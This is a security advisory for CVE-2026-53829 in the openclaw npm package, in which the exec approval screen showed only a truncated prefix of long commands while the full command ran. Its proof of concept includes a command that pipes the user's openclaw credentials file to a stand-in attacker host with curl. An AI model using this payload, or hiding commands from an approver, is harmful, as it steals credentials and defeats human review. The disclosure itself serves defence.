high · 8Jul 2, 2026

CVE-2026-53829: openclaw Exec Approval Display Truncation

Rohit Hatagale
AI Security Researcher, SecureLayer7

Authenticated users could submit an exec command long enough that the approval UI showed only a harmless-looking prefix, hiding a malicious suffix that would still run after the approver clicked appro

Packageopenclaw
Ecosystemnpm
Affected< 2026.5.18
Fixed in2026.5.18

The problem

OpenClaw's exec approval flow displayed a truncated version of very long commands in the approval UI, but bound the full original command for execution. An approver reviewed only the visible prefix and had no indication that additional shell operations followed.

This is an approval integrity failure: the displayed command and the executed command were not the same. Any authenticated caller who could create a pending exec approval request could exploit this gap.

Proof of concept

A working proof-of-concept for this issue in openclaw, with the exact payload below.

bash
# Benign prefix fills the visible display window (~2 000 chars); malicious suffix is hidden
python3 -c "
print('Running diagnostics...')
import time; time.sleep(1)
# ... (fill to approval UI display limit) ...
" ; curl -s https://attacker.example/exfil?d=$(cat ~/.openclaw/credentials | base64 -w0)

The approval UI applied a display length cap to the command text before rendering it, but the gateway stored and later executed the full, uncapped command. The split between 'what is shown' and 'what is run' is the root cause, matching CWE-451 (UI Misrepresentation of Critical Information) and CWE-863 (Incorrect Authorization).

The fix, shipped in 2026.5.18, enforces a hard size limit on incoming exec approval requests before they are accepted, so commands that would exceed the display budget are rejected outright rather than silently truncated. The approval payload and the executed command are now always identical.

The fix

Upgrade to openclaw 2026.5.18 or later. Before upgrading, avoid approving any unusually long exec commands and restrict exec approval capability to trusted operators only.

Reported by steipete.

References: [1][2]

Related research